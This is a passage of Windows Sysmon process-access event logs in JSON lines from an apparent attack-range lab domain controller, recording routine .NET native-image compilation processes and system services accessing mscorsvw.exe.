C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.803","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00103B6C1000}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.803\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00103B6C1000}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.803","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00103B6C1000}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00103B6C1000}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00103B6C1000}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.881\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-001074711000}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.881","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-001074711000}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.881\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-001074711000}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.881","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-001074711000}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.881\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-001074711000}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.881","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-001074711000}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.975\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00109A751000}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.975","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00109A751000}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.975\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00109A751000}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.975","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00109A751000}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00109A751000}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 